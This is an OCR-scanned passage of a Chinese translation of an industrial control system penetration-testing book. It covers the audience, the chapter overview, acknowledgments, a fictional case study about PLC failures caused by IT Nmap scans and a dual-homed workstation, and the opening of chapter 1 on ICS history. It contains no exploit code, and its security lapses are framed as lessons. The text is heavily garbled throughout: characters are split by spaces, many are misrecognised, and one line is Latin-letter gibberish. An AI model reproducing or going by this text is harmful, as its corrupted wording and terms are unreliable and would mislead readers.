` 工控 系统 网 络 安全 威胁 情报 分 析 人 员 

* 致力 于 工控 系统 相关 设备 与 应 用 程序 漏洞 挖掘 的 研究 人 员 

研发 适用 于 工控 系统 设备 、 应 用 、 网 络 产 品 的 网 络 安全 产品 开发 商 


. 工控 系统 厂商 


. 对 工控 系统 渗透 测试 技术 感 兴趣 的 网 络 安 全 爱好 者 以 及 渗透 测试 人 员 

其 他 对 本 书 感 兴趣 的 读者 群体 包括 : 

* 工控 系统 资产 所 有 者 以 及 负责 招聘 渗透 测试 团队 的 管理 人 员 

. 工控 系统 资产 所 有 者 以 及 负责 工控 系统 安全 团队 的 管理 人 员 

里 然 这 些 读者 群 不 需要 知道 工控 系统 渗透 测试 过 程 中 的 所 有 技术 细节 ， 但 是 他 们 应 该 对 工控 系统 网 络 安全 威胁 与 渗透 测试 技术 有 一 个 大 概 的 了 解 。 
本 书 的 组 织 方式 


在 学 习 本 书 的 过 程 中 无 须 逐 页 阅读 。 例 如 ， 对 工控 系统 环境 已 经 非常 熟悉 的 读者 可 以 跳 过 第 1 草 。 渗 透 测试 人 员 则 可 以 直接 跳 到 与 其 当前 测试 内 容 有 关 的 具体 
章节 。 不 过 ， 书 中 每 个 主题 的 安排 顺序 均 同 现实 中 渗透 测试 项 目的 实施 流程 相 一 致 。 所 以 ， 为 了 了 解 工控 系统 渗透 测试 的 全 过 程 ， 从 头 开始 逐 页 阅读 也 是 个 不 错 
的 选择 。 资 产 所 有 者 以 及 管理 人 员 也 可 以 采用 这 种 方式 ， 来 获取 对 整个 工控 系统 渗透 测试 和 威胁 建 模 过 程 ， 以 及 各 组 成 部 分 的 完整 认识 。 


本 书 的 每 一 部 分 都 会 安排 案例 分 析 。 这 些 案例 分 析 虽 然 是 虚构 的 ， 但 是 其 背后 蕴 合 的 内 容 都 是 由 可 行 的 事件 所 组 成 的 ， 将 这 些 内 容 组 合 起 来 可 以 构成 一 个 完 
整 的 场景 。 故 事 中 涉及 的 特定 行业 、 系 统 以 及 妆 置 设备 的 细节 并 未 明确 摘 述 ， 所 以 来 自 不 同行 业 的 读者 都 可 以 从 中 找到 与 自己 行业 似曾相识 的 感觉。 在 阅读 这 些 
案例 分 析 时 ， 读 者 可 以 尝试 着 将 自己 融入 工控 系统 安全 专家 的 角色 ， 看 看 自己 能 否 找 出 故事 中 的 机 构 、 人 员 所 犯 下 的 错误 ， 正 是 这 些 错 误 最 终 导致 了 信息 泄露 以 
及 入 侵 攻击 。 关 于 这 些 案例 分 析 中 用 到 的 方法 、 技 术 的 参考 文献 和 技术 细节 可 以 在 每 个 案例 分 析 的 结尾 位 置 或 者 案例 分 析 所 在 的 章节 中 找到 。 对 抗 措施 在 全 书 都 
可 以 找到 ， 也 可 以 在 第 三 部 分 找到 。 


第 一 部 分 (第 1 章 至 第 3 章 ) 主要 包括 从 较 高 层面 构建 渗透 测试 项 目的 相关 内 容 ， 为 后 续 内 容 做 铺垫， 并 对 工控 系统 、 风 险 评估 以 及 威胁 建 模 过 程 进 行 了 简短 


第 二 部 分 (第 4 章 至 第 8 章 ) 深入 介绍 了 工控 系统 渗透 测试 过 程 中 的 细节 。 首 先 对 工控 系统 渗透 测试 策略 进行 了 概述 ， 然 后 以 《黑客 大 曝光 》 式 的 风格 介绍 
细节 、 技 术 以 及 实例 。 为 了 更 详尽 地 涵盖 工控 系统 渗透 测试 技术 的 方方面面 ， 我 们 对 工控 系统 设备 、 应 用 程序 以 及 协议 中 最 常见 漏洞 类 别 中 的 部 分 样本 进行 了 分 
析 。 每 类 都 表示 若干 种 相关 的 、 现 实 中 已 经 披露 的 漏洞 ， 包 括 与 之 关联 的 ICS-CERT 公 告 。 本 着 渗透 测试 的 “完整 性 ”原则 ， 本 书 就 工控 系统 漏洞 研究 进行 了 高 级 
进 阶 内 容 的 入 门 介绍 〈 再 提醒 一 下 ， 书 中 未 披露 现实 中 存在 的 任何 0-day 漏 洞 ) 。 由 于 恶意 代码 迅速 成 为 工控 系统 安全 中 的 一 个 重要 主题 ， 所 以 我 们 对 工控 系统 恶 
意 代 码 也 进行 了 分 析 ， 并 介绍 了 其 实现 机 制 及 对 抗 措施 。 


第 三 部 分 (第 9 章 和 第 10 章 ) 主要 通过 研究 工控 系统 网 络 安全 策略 来 形成 风险 评估 过 程 的 闭环 ， 但 是 仅仅 涉及 了 本 书 中 讨论 到 的 攻击 技术 。 正 如 前 文 所 述 , 已 
有 大 量 内 容 对 工控 系统 网 络 安全 对 抗 措 施 进行 介绍 ， 我 们 会 在 适当 的 位 置 做 出 提示 帮助 读者 获取 相关 信息 。 本 部 分 的 目标 是 帮助 读者 针对 攻击 采取 正确 的 响应 与 
对 抗 措施 。 因 此 ， 为 了 便于 参考 ， 针 对 各 自 章节 攻击 方式 所 提出 的 对 抗 措施 也 均 会 进行 相应 的 总 结 。 


最 后 ， 第 四 部 分 的 附录 中 包含 了 术语 表 以 及 在 风险 评估 、 威 胁 建 模 及 渗透 测试 项 目 中 卓有成效 的 流程 图 和 图 表 。 
各 章 概 述 


下 面 是 对 各 个 章节 的 概要 ， 分 别 对 各 章节 的 内 容 进行 了 简要 介绍 。 

第 一 部 分 “做 好 准备 : 工业 控制 系统 渗透 测试 就 位 

第 1 章 “工业 控制 系统 安全 概述 

从 较 高 的 层次 简短 介绍 工控 系统 架构 、 组 成 部 分 、 功 能 以 及 术语 等 方面 ， 读 者 能 够 获取 到 理解 本 书 概念 所 需 的 基本 工控 系统 知识 。 
第 2 草 "工业 控制 系统 风险 评估 

就 如 何在 工控 系统 风险 评估 过 程 应 用 本 书 内 容 以 及 如 何 根据 环境 开展 工控 系统 渗透 测试 提供 了 一 个 简短 的 高 级 指南 。 

第 3 草 通过 威胁 建 模 获 取 具 有 可 操作 性 的 工业 控制 系统 威胁 情报 


虽然 数 十 年 来 术语 威胁 情报 (threat intelligence) 在 情报 界 一 直 是 个 不 可 或 缺 的 概念 ， 但 是 在 工业 界 中 则 是 最 近 才 流行 起 来 的 一 个 时 里 词 汇 。 本 章 讨 论 了 如 
何 利用 威胁 情报 以 及 如 何 利用 获取 的 相关 资源 对 工控 系统 风险 管理 策略 进行 改进 。 


二 部 分 “工业 控制 系统 入 侵 
第 4 章 渗透 测试 策略 


为 了 得 到 准确 、 符 合 实际 的 结果 以 及 保护 运营 过 程 的 功能 安全 ， 必 须 拟定 合适 的 工控 系统 策略 。 本 章 主要 基于 现实 的 风险 场景 讨论 工控 系统 渗透 测试 策略 ， 


并 融 避 免 对 工控 系统 生产 环境 造成 影响 的 方法 与 步骤 进行 了 概述 。 
第 5 章 ”工业 控制 系统 协议 攻击 
本 章 详细 介绍 了 在 常见 工控 系统 协议 中 发 现 的 漏洞 以 及 与 之 对 应 的 漏洞 利用 技术 。 
Som ”工业 控制 系统 设备 与 应 用 攻击 
本 章 结 合 ICS-CERT 公 告 ， 研 究 了 工控 系统 设备 和 应 用 程序 的 漏洞 ， 以 及 相应 的 漏洞 利用 技术 。 
Ble ”工业 控制 系统 “0-day” 漏 洞 研究 


大 部 分 渗透 测试 依赖 于 众多 的 已 知 漏洞 。 但 是 ， 未 披露 甚至 未 发 现 的 漏洞 〈( 即 0-day 漏 洞 ) 却 会 市 来 更 加 严重 的 问题 。 因 此 ， 具 备 独 立 挖掘 未 公开 漏洞 的 能 
在 风险 管理 策略 中 会 赋予 全 略 制订 者 以 天 键 优势 。 昌 然 仅仅 一 个 章节 不 足以 涵盖 漏洞 研究 的 方方面面 ， 但 是 ， 本 章 不 仅 对 工控 系统 漏洞 挖掘 策略 进行 了 概述 ， 还 
提供 了 可 供 进 一 步 研究 的 关键 资源 。 


第 8 草 "工业 控制 系统 恶意 代码 


自从 2010 年 遭受 Stuxnet 攻 击 以 来 ， 工 业界 清醒 地 认识 到 恶意 代码 已 经 将 工控 系统 环境 作为 了 攻击 目标 ， 并 且 确 实 能 够 对 工控 系统 环境 造成 影响 。 自 从 那 时 
起 ， 众 多 攻击 活动 均 以 Stuxnet 为 模板 ， 开 友 出 了 针对 工控 系统 的 恶意 代码 ， 用 以 潜入 、 感 染 天 键 系统 ， 甚 至 对 天 键 系统 造成 破坏 。 本 章 分 析 了 恶意 代码 开 肥 人员 
在 编写 专门 针对 工控 系统 环境 的 恶意 代码 时 所 用 到 的 结构 、 机 制 及 技术 。 最 后 ， 为 了 帮助 读者 对 恶意 代码 所 能 造成 的 工控 系统 威胁 拥有 更 加 深入 的 认识 ， 本 章 对 
部 分 现实 中 针对 工控 系统 的 知名 恶意 代码 攻击 活动 进行 了 介绍 。 


第 三 部 分 “融会 贯通 : 风险 缓解 

第 9 章 ”工业 控制 系统 安全 标准 入 门 

本 章 对 贡 见 的 工控 系统 网 络 安全 标准 ， 以 及 这 些 标准 同 本 书 中 所 提 及 的 技术 与 内 容 的 关联 进 行 了 简要 介绍 。 
第 10 章 ”工业 控制 系统 风险 缓解 策略 


虽然 本 书 并 不 想 成 为 一 本 关于 工控 系统 网 络 安全 对 抗 措施 技术 的 详细 指南 ， 但 第 10 章 仍然 对 与 本 书 主 题 相 关 的 工控 系统 风险 缓解 策略 及 对 抗 措 施 进行 了 介 


JJ 
绍 。 


第 四 部 分 ”附录 
附录 A 缩 略 语 表 
附录 A 中 的 内 容 是 工控 系统 网 络 安全 中 常用 的 缩 略 语 。 
附录 B ”术语 表 
附录 B 中 的 内 容 定 义 了 工控 系统 网 络 安全 中 常用 的 术语 。 
附录 C 工业 控制 系统 风险 评估 与 渗透 测试 方法 流程 图 


附录 C 中 提供 了 一 组 开展 工控 系统 风险 评估 以 及 渗透 测试 的 模板 与 流程 图 。 
基本 组 成 模块 : 攻击 与 对 抗 措施 


同 其 他 带 有 《黑客 大 曝光 》 题 目的 图 书 一 样 ， 本 书 的 基本 组 成 模块 也 是 在 “入 侵 ” 章 节 中 所 讨论 的 攻击 与 对 抗 措施 。 本 书 中 对 攻击 的 强调 方式 同 整个 《黑客 
大 了 曝光》 系列 中 的 其 他 图 书 一 样 : 


采用 这 种 图 标 对 攻击 进行 强调 可 以 很 容易 地 识别 出 特定 的 渗透 测试 工具 和 | 方法， 帮助 读者 快速 定位 到 说 服 管理 层 为 新 安全 计划 提供 资金 支持 时 所 需要 的 信 
息 。 当 涉及 对 抗 措 施 时 ， 我 们 也 遵循 了 “黑客 大 曝光 ”系列 图 书 采 用 的 一 贯 方式 ， 在 每 次 介绍 完 一 种 攻击 方式 或 者 一 系列 相关 的 攻击 方式 之 后 ， 紧 接着 介绍 对 抗 
措施 。 对 所 措施 的 图 标 也 保持 不 变 : 


© 对 抗 措施 图 标 


该 图 标 提醒 读者 下 面 介 绍 的 将 是 关键 修复 信息 。 


在 第 5 章 和 第 6 草 中 对 每 种 攻击 方式 的 风险 评级 是 这 样 计算 的 ， 首 先 对 各 攻击 方式 的 流行 度 、 难 易 度 以 及 影响 力 进行 赋值 ， 然 后 对 各 单项 得 分 取 平 均值 。 
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致谢 


首先 ， 我 要 感谢 我 的 妻子 Ashley 以 及 我 的 母 杀 。 你 们 牺牲 了 无 数 个 夜晚 和 周末 照顾 宝宝 ， 为 我 腾 出 了 时 间 来 撰写 本 书 。 特 别 感谢 Joel Scambray 相 信 此 书 能 
够 传承 “黑客 大 曝光 ”系列 图 书 的 一 贯 品质 。 感 谢 团队 中 的 作者 、 编 辑 以 及 所 有 在 本 书 撰写 过 程 中 做 出 贡献 的 人 ， 感 谢 大 家 为 此 付出 的 时 间 和 和 努力。 我们 平时 都 
有 日 常 工作 也 都 有 家 庭 需 要 照顾 ， 但 几 个 月 里 大 家 经 常 熬 夜 并 牺牲 周 末 的 休息 时 间 来 完成 本 书 的 撰写 工作 。 最 后 ， 向 在 网 络 安全 职业 道路 上 对 我 产生 深远 影响 的 
人 们 致 以 衷心 的 感谢 (感谢 Chuck Gordon 和 Danny Weaver 为 我 指点 迷津 ， 感 谢 Gordon Wingate, Chad Skipper, John Groman III, Nikos Salmatanis、 
Jonathan Pollet, Jeff Whitney, Russel Treat 及 Bryan Parke[ 教 给 了 我 很 多 宝贵 的 经 验 ， 并 且 给 予 我 足够 的 信任 ， 为 我 提供 了 很 多 机 会 ) 。 


Clint Bodungen 


我 要 感谢 朋友 们 以 及 工业 网 络 安全 圈 中 的 同事 们 所 付出 的 不 懈 努 力 ， 尤 其 是 ISA-99/ISA-62443 安 全 标准 团队 ， 还 有 在 过 去 的 15 年 里 一 直 致 力 于 识别 并 降低 关 
键 基础 设施 风险 的 专家 们 。 


——Bryan Singer 


感谢 Clint Bodungen 让 我 有 机 会 参与 到 本 书 的 撰写 工作 ， 当 我 需要 思路 时 他 给 予 我 帮助 ， 并 督促 我 按照 进度 完成 撰写 工作 ! 我 还 要 感谢 Joel Scambray, R 
谢 他 提出 的 宝贵 建议 ， 帮 助 我 在 保持 理智 的 情况 下 完成 了 本 书 的 撰写 工作 。 


—Aaron Shbeeb 


特别 感谢 我 的 妻子 ， 她 是 一 位 非 党 理性 的 伴侣 ， 如 果 没 有 她 做 的 奶 酷 通 心 粉 以 及 无 私 的 奉献 ， 我 可 能 连 目前 一 半 的 水 平 都 达 不 到 。 还 要 感谢 我 的 宝贝 们 ， 他 
们 使 我 在 每 天 的 生活 中 充满 次 关 ， 并 且 不 断 以 各 种 方式 市 给 我 惊喜 。 


—Kyle Wilhoit 
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案例 研究 ”第 一 部 分 : 无 尽 的 火 难 


星期 三 ， 上 午 9 点 45 分 


Bob 端 着 他 上 午 的 第 二 杯 咖啡 在 显示 终端 前 坐 下 ， 继 续 扫 视 着 人 机 界面 (Human-Machine Interface, HMI) 。 在 他 面前 的 桌子 上 ， 并 排 摆 着 三 台 连 接 在 一 


起 的 23 寸 显示 器 。 他 轻 苏 地 笑 了 笑 ， 登 录 提示 符 惹 得 他 心烦 。 
“这 就 是 信息 安全 ， 呵 呵 .…..”， 他 在 心里 挖苦 道 。 
Bob 记 得 以 前 事情 要 简单 许多 ， 也 要 方便 许多 。 以 前 他 可 以 离开 他 的 终端 一 阵子 ， 去 外 面 抽 根 烟 ， 喝 上 一 杯 新 鲜 的 咖啡 ， 等 到 他 回来 终端 显示 器 上 还 跟 他 离 
开 时 一 个 样子 。 而 现在 ， 他 离开 以 后 回来 不 得 不 先 在 屏幕 上 输入 烦人 的 口令 。 
“有 没有 搞 错 ! ”Bob 想 着 ，“ 谁 会 没事 干 在 我 上 厕所 的 时 候 动 我 的 终端 ? ” 
Bob 在 键盘 上 输入 他 的 用 户 名 一 operator1 和 口令 一 operator1234。 终 端 显示 器 大 多 采用 灰色 调 ， 显 示 着 不 断 变 化 的 数据 读数 ， 还 有 全 彩色 显示 的 水 箱 、 仪 
表 、 水 录 和 阀门， 对 于 控制 室 操 作 员 而 言 ， 一 切 如 常 。 
突然 ， 显 示 屏 上 一 些 奇怪 的 东西 引起 了 Bob 的 注意 。 作 为 一 名 经 验 丰 语 的 操作 员 ，Bob 见 过 各 种 各 样 的 警报 ， 几 乎 没有 什么 是 他 没 遇 到 过 的 。 但 是 这 次 不 一 
样 。 
是 .……” Bob 身 体 前 倾 ， 上 着 眼 聚精会神 地 盯 着 屏幕 。 点 击 了 几 次 鼠标 之 后 ，Bob 嗓 了 几 口 滚烫 的 咖啡 ， 然 后 拿 起 了 电话 : “IR! jim。 最 近 还 好 吗 ?“ 
“做 一 天 和 尚 撞 一 天 钟 呐 ， 兄 弟 .….. 有 什么 事 吗 ?“ 
“ 嘿 ， 我 这 里 的 一 些 控制 器 上 出 现 了 奇怪 的 读数 。 这 不 合 常理 啊 ， 并 且 突 然 出 现 了 好 几 次 。 你 能 检查 一 下 吗 ?“ 
“好 的 ， 没 问题 ， 见 第 。 编 号 是 多 少 ?“ 
Jim 把 Bob 告 诉 他 的 设备 1D 号 记 在 本 子 上 ，“ 我 这 就 检查 一 下 ， 马 上 给 你 回电 话 。 ” 
“谢谢 你 ，Jim。”Bob 挂 上 电话 继续 享用 他 的 咖啡 。 


Jim 把 工作 站 中 电子 邮件 的 窗口 最 小 化 ， 然 后 打开 了 Windows 远 程 桌 面 工具 。 公 司 工 作 站 通常 不 允许 访问 过 程控 制 网 络 (Process Control 
Network, PCN) ， 但 是 jim 已 经 在 他 的 工作 站 上 安 半 了 第 二 块 网 卡 (Network Interface Card, NIC) 。 这 样 他 的 工作 站 融 既 可 以 连接 到 公司 网 络 ， 也 可 以 连 
妆 到 过 程控 制 网 络 ， 从 而 很 方便 地 同时 访问 公司 服务 和 过 程控 制 网 络 中 的 设备 。 类 似 这 样 的 双 宿 主 连接 是 违反 新 制订 的 网 络 安全 策略 的 ， 但 自从 转换 到 以 太 网 标 
准 以 来 ，Jim 和 他 的 工程 师 同事 们 一 直 都 是 这 样 访 问 数字 设备 的 。 尽 管 这 样 做 会 市 来 潜在 的 安全 风险 ， 但 操作 员 们 为 了 在 人 机 界面 上 也 能 收 到 电子 邮件 的 通知 仍然 
经 常 这 么 干 ， 而 工程 师 们 这 人 么 干 则 是 为 了 更 便捷 地 访问 过 程控 制 网 络 中 的 设备 。 

Jim 嘻 得 ， 只 要 IT 部 门 不 知道 ， 这 样 做 又 不 会 伤害 到 淮 。 


过 程控 制 网 络 工 程 工作 站 的 远程 桌面 弹 了 出 来 ，Jim 开 始 进 行 诊断 检查 。 的 确 ，Jim 马 上 意识 到 他 有 麻烦 了 。 他 的 几 个 可 编程 序 控制 器 (Programmable 
Logic Controller, PLC) 进入 了 故障 模式 并 进行 重 置 。 一 般 来 说 这 并 不 会 导致 出 现 紧急 情况 ， 因 为 当 它 们 重 置 了 时， 它们 会 故障 转移 到 “B 网 络 ” 中 的 备份 PLC。 
但 是 现在 备份 PLC 也 出 现 了 同样 的 问题 (进入 了 故障 模式 并 重 置 ) ， 于 是 备份 PLC 又 故障 转移 到 最 初 主 网 络 “A 网 络 ” 中 的 PLC。 这 种 情况 一 直 重 复出 现 ，PLC 不 
断 在 重 置 与 故障 转移 之 间 循 环 。 而 且 不 止 一 对 PLC 出 现 了 这 种 情况 ， 好 几 对 PLC 都 是 这 样 。 如 果 这 种 情况 继续 下 去 ， 操 作 员 将 失去 对 某 个 设备 的 控制 。 


jim 从 他 IT 部 门 的 一 个 朋友 那里 学 到 了 一 招 ， 想 着 也 许 能 派 上 用 场 。 他 打开 了 Wireshark， 这 是 一 个 用 于 网 络 流量 分 析 的 网 络 “ 嗅 探 器 ”。 看 着 网 络 数据 包 在 
显示 屏 上 一 屏 一 屏 地 滚 过 ， 他 立即 意识 到 事情 不 对 劲 。 他 的 过 程控 制 网 络 中 的 流量 通 弟 相对 比较 小 ， 并 且 是 可 以 预测 的 。 然 而 现在 他 看 到 了 大 量 的 ICMP 协 议 请 求 
以 及 一 些 来 自 与 之 相 邻 的 公司 网 络 的 TCP 协 议 流量 。jJim 之 前 从 未 在 他 的 过 程 网 络 中 看 到 过 这 样 的 网 络 流量 ， 更 不 要 说 这 些 流量 是 来 自 一 个 公司 网 络 了 1! 


Jim 拿 起 电话 打 给 他 在 1T 部 门 的 朋友 Mike，“ 嘿 ! Mike, 我 是 jm。 最 近 怎 样 ?“ 

“没什么 特别 的 ， 只 是 要 处 理 一 些 安全 评估 的 事情 。” 

Jim 的 脸 涨 得 通红 ， 心 中 窜 起 一 团 火 : “安全 评估 ? 是 哪 种 安全 评估 ? 你 们 正在 做 的 事情 会 影响 到 我 的 设备 吗 ? 我 这 里 的 PLC 出 间 题 了 ! ” 
“ 呢 .…… 应 该 不 会 吧 ，” Mike 说 道 ， 听 起 来 有 点 困惑 。 “过 程控 制 网 络 不 在 这 次 评估 的 范围 之 内 。 我 们 只 是 评估 公司 的 IT 网 络 啊 。" 

“我 看 到 从 公司 网 络 过 来 的 各 种 网 络 流量 在 ;中 击 我 的 设备 。 我 们 不 是 应 该 有 防火 墙 之 类 的 东西 能 够 阻止 这 类 事情 友 生 的 吗 ?”jJim 着 急 地 间 。 


“我 们 在 公司 网 络 和 过 程控 制 网 络 之 间 是 架设 有 一 台 防 火 墙 ， 但 是 我 们 允许 ICM P 包 通过 。 毕 竟 几 个 ping 探 测 包 能 有 什么 危害 呢 ” 我 们 还 开放 了 几 个 TCP 端 口 
用 来 与 工业 实时 历史 数据 库 之 类 的 东西 进行 通信 。 再 说 了 ， 我 们 的 评估 只 是 做 一 些 轻 度 的 Nmap 扫 描 而 已 ， 主 要 丈 是 一 些 ping 扫 描 和 和 SYN 请求 数据 包 。” Mike 辩 
解 道 ， 但 是 也 开始 有 些 紧 张 了 。 

“Nmap 是 什么 鬼 ? ”Jim 大 喊 道 ， 同 时 更 加 烦躁 起 来 ，“ 你 们 不 要 把 我 的 设备 当成 你 们 的 上 T 网 络 ! 不 管 它 是 不 是 应 该 在 你 们 的 评估 范围 之 内 ， 你 们 的 评估 正 
三 影 响 我 的 设备 ! 我 要 你 们 立即 停止 这 么 做 !“ 


“ 啊 ， 天 哪 ! 好 的 ， 我 马上 告诉 他 们 让 他 们 停 下 手边 的 活 。 如 果 你 那 边 有 什么 变化 马上 告诉 我 。” 


"FH, ST ot. " Jimi ABIA, BEATE, ETEL. 
几 分 钟 以 后 ，Jim 友 现 来 自 公 司 网 络 的 可 疑 流量 没有 了 ， 他 的 过 程 网 络 看 起 来 似乎 恢复 了 正常 。 


“ 呵 ，IT 安 全 .…” 他 在 心里 讽刺 道 。 
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凌晨 3: 30， 电 脑 显 示 器 发 出 苑 白 的 亮光 ， 网 络 交 换 机 闪 着 绿 光 ， 一 名 黑客 坐 在 键盘 前 ， 正 在 研究 着 他 的 下 一 个 目标 。 只 有 轻巧 的 键盘 襄 击 声 ， 以 及 超 负 倚 运 
转 的 计算 机 设备 的 散热 风扇 发 出 的 声音 ， 等 待 着 友 起 虚拟 世界 中 的 破坏 行动 。 下 面 让 我 们 与 这 位 疯狂 的 大 反派 一 起 ， 开 始 他 遍及 全 球 且 持 续 多 日 的 以 咖啡 因为 动 
力 的 黑客 狂欢 之 旅 。 已 经 有 多 个 大 型 石油 和 天 然 气 设施 倒 在 了 他 的 破坏 征程 之 上 。 


在 他 最 喜欢 的 搜索 引擎 中 点 击 了 几 次 鼠标 之 后 ， 黑 客 很 快 寻找 到 了 下 一 个 目标 : 位 于 墨西哥 湾 的 一 台 石 油 钻机 。 两 次 Nmap 扫 描 之 后 ，“Vendor X” 控 制 系 
统 让 他 眼前 一 亮 ， 这 是 一 个 可 编程 序 控制 器 (Programmable Logic Controller, PLC) 。 几 次 键盘 裔 击 之 后 ， 攻 击 开始 了 。 卢 刻 之 后 ， 钼 井 平台 上 友 生 了 火灾 并 
失去 控制 ， 人 员 接 到 指令 开始 踢 散 。 损 失 已 经 不 可 避免 。 此 时 ， 黑 客 已 经 清除 了 系统 中 他 所 有 的 访问 痕迹 ， 开 始 寻找 下 一 个 目标 。 


据 传 ，1995 年 一 名 政府 雇员 说 服 法 官 对 凯 文 . 米 特 尼 克 [ 判 处 了 四 年 半 的 审 前 单独 监禁 和 八 个 月 的 审 后 单独 监禁 ， 理 由 是 只 要 他 对 任何 投 币 电 话 吹 段 儿 口哨 ， 
就 能 够 下 达 发 射 指令 发 射 美国 的 核武 器 。 时 至 今日 ， 虽 然 很 多 人 会 抱怨 这 种 说 法 明显 夸大 其 辞 ， 但 如 果 他 们 相信 黑客 大 会 上 的 新 闻 报 道 和 消息 的 话 ， 其 中 的 绝 大 
多 数 人 会 觉得 前 文 描述 的 工业 控制 系统 (Industrial Control System, ICS) 入 侵 场景 是 完全 有 可 能 发 生 的 。 


抛 开 凯 文 : 米 特 尼克 不 论 ， 很 多 工程 师 和 资产 所 有 者 都 会 很 快 地 忽略 掉 类 似 的 入 侵 场 景 ， 他 们 认为 借助 精心 部 署 的 多 重 防 护 设备 ， 那 些 灾 难 性 事件 就 不 太 可 能 
或 者 不 可 能 友 生 ， 其 中 防护 设备 包括 安全 仪表 系统 (Safety Instrumented Systems, SIS) ， 诸 如 限 位 开关、 机 器 超速 保护 六 置 、 物 理 紧急 安全 阀 之 类 的 物理 保 
护 装置 ， 还 有 其 他 一 些 安全 防护 组 件 。 与 此 同时 ， 网 络 安全 研究 人 员 和 业内 专家 对 最 新 发 布 的 漏洞 大 肆 吹 捧 ， 束 好 像 它们 是 让 臣 惧 成 为 现实 的 关键 。 而 那些 真正 
懂得 控制 系统 安全 的 人 则 明日 ， 导 致 灾难 性 的 事件 远 没 有 利用 一 个 最 新 的 漏洞 那么 简单 。 


解决 这 两 个 阵营 在 观点 上 的 极端 差异 ， 需 要 同时 对 网 络 安全 和 工程 的 运行 方式 有 着 深入 的 理解 。 工 控 系 统 安全 在 很 多 方面 不 同 于 “传统 的 ”网 络 安全 (MIT 
安全 、 信 息 安全 、 业 务 网 络 安全 等 ) 。 那 些 想 要 完全 掌握 工控 系统 安全 所 有 理论 和 “最 佳 实践 ”的 人 们 很 快 会 意识 到 ， 工 控 系 统 安 全 不 仪 需要 了 解 涵盖 常见 网 络 
硬件 和 操作 系统 的 网 络 安全 知识 ， 还 需要 知道 控制 系统 的 工作 方式 ， 以 及 工业 过 程 的 物理 和 工程 要 求 ， 因 此 工控 系统 安全 要 求 涵盖 内 容 广 泛 、 涉 及 多 个 学 科 专 
业 。 只 有 掌握 了 所 有 这 三 个 学 科 知 识 的 人 才能 够 更 好 地 理解 和 解决 现代 工业 过 程 中 所 面临 的 现实 威胁 。 


[1] Kevin David Mitnick ， 生 于 1963 年 ， 美 国 著 名 计算 机 安全 顾问 、 作 家 和 黑客 。 有 评论 称 他 为 “世界 头号 黑客 ”。 一 译 者 注 


1.1 _ 信息 物理 系统 : 机 器 崛起 


里 然 在 电影 《终结 者 》 里 女 主 角 Sarah Connor 警 告 我 们 机 器 人 终 将 统治 人 类 的 预言 有 些 言 过 其 实 ， 但 是 现代 工业 过 程 所 面临 的 现状 是 : 工控 系统 领域 里 存在 
着 清晰 而 现实 的 危险 。 其 潜在 影响 几乎 无 所 不 包 ， 从 大 规模 生产 的 中 断 到 危及 人 身 安 全 的 危险 故障 都 包含 其 中 。20 世 纪 60 年 代 未 到 70 年 代 初 ， 电 子 化 工业 控制 系 
统 开始 投入 使 用 。 在 可 编程 序 控制 器 (PLC) 之 前 ， 工 业 过 程 的 控制 通过 一 系列 复杂 的 硬 接线 继电器 、 定 时 器 、 序 列 帮 生 器 和 手动 控制 技术 (如 真空 回路 控制 ) 
来 进行 管理 。1968 年 ， 通 用 汽车 旗下 的 Hydra-Matic 自 动 变速 器 发 布 一 份 招标 建议 书 ， 和 希望 能 够 开发 一 套 新 的 设备 取代 硬 接线 继电器 ， 可 编程 序 控制 器 随 之 诞 
Æ, Dick Morley 发 明了 模块 化 数字 控制 器 (MOdular Digital CONtroller) ， 即 Modicon Dick M orley 也 被 称 为 “PLC 之 父 ”。PLC 的 核心 是 梯形 逻辑 
(ladder logic) ， 是 用 于 控制 工业 过 程 的 主流 方法 。 而 梯形 逮 辑 的 核心 则 是 一 个 大 型 的 上 f-Then-Else 决 策 树 ， 用 于 对 过 程 或 生产 操作 进行 顺序 控制 。 图 1-1 是 梯 
形 逻 辑 的 一 个 例子 。 


PLC 的 横 空 出 世 带 来 了 大 量 基 于 逻辑 的 数字 系统 的 出 现 ， 例 如 监控 与 数据 采集 系统 (Supervisory Control and Data Acquisition, SCADA) 、 集 散 控 制 系统 
(Distributed Control Systems, DCS) 等 。 如 今 ， 除 了 工业 自动 化 控制 之 外 ， 工 控 系 统 和 自动 化 系统 在 我 们 的 日 常生 活 中 几乎 无 处 不 在 。 例 如 ， 供 暖 系统 、 通 
风 系 统 、 空 调 系统 (HVAC) 、 建 筑 升 降 机 、 家 中 的 智能 电表 、 变 电站 自动 化 系统 和 电网 传输 配送 系统 中 的 SCADA 系 统 和 传感器 网 络 、 汽 车 制造 中 的 机 器 人 控制 
系统 、 食 品 和 饮料 三 中 的 自动 包装 系统 等 ， 而 这 些 还 只 是 控制 系统 渗透 到 我 们 日 常生 活 中 方方面面 的 少数 几 个 例子 。 
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图 1-1 梯形 逻辑 实例 


但 是 任何 一 名 软件 程序 员 都 知道 ， 基 于 逻辑 的 电子 系统 很 容易 出 现 故 障 ， 而 这 些 故 障 在 硬 接线 模拟 系统 中 却 并 不 人 存在。 不过， 在 20 世 纪 70 年 代 到 90 年 代 ， 由 
于 许多 系统 仍然 依赖 于 模拟 MO (输入 /输出 ) ， 并 且 与 业务 网 络 完 全 隔离 ， 因 此 其 中 很 多 威胁 被 看 作 是 “可 管理 的 ”。 但 是 ，20 世 纪 90 年 代 初 ， 鉴 于 诸如 
ControlNet、DeviceNet、Profibus、Serial Modbus 等 众多 协议 都 是 基于 某 一 个 特定 厂商 所 持 有 的 专 有 技术 而 制订 的 ， 而 资产 所 有 者 对 生产 车 间 信 息 可 视 化 和 
平台 标准 化 的 需求 程度 越 来 越 高 ， 厂 商 也 想方设法 降低 生产 成 本 。 使 用 通用 开放 技术 的 呼声 越 来 越 高 ， 由 此 这 推动 了 通用 开放 技术 在 生产 车 间 中 的 应 用 ， 例 如 
Windows 操 作 系 统 和 以 太 网 (使 用 网 络 互联 协议 ， 即 IP 协 议 ) 。 在 这 种 融合 之 下 ， 资 产 所 有 者 需要 管理 两 个 网 络 : 负责 业务 信息 的 信息 技术 (Information 
Technology, IT) 网 络 和 负责 生产 运行 维护 的 运营 技术 (Operational Technology, OT) 网 络 a 今天 ， 这 种 IT 与 OT 的 融 
合 已 经 相当 流行 ， 并 且 出 于 业务 上 的 需要 ， 通 常 还 会 要 求 将 某 些 OT 数 据 传送 到 IT 网 络 中 去 。 


1.1.1 “传统 威胁 的 全 新 攻击 向 量 


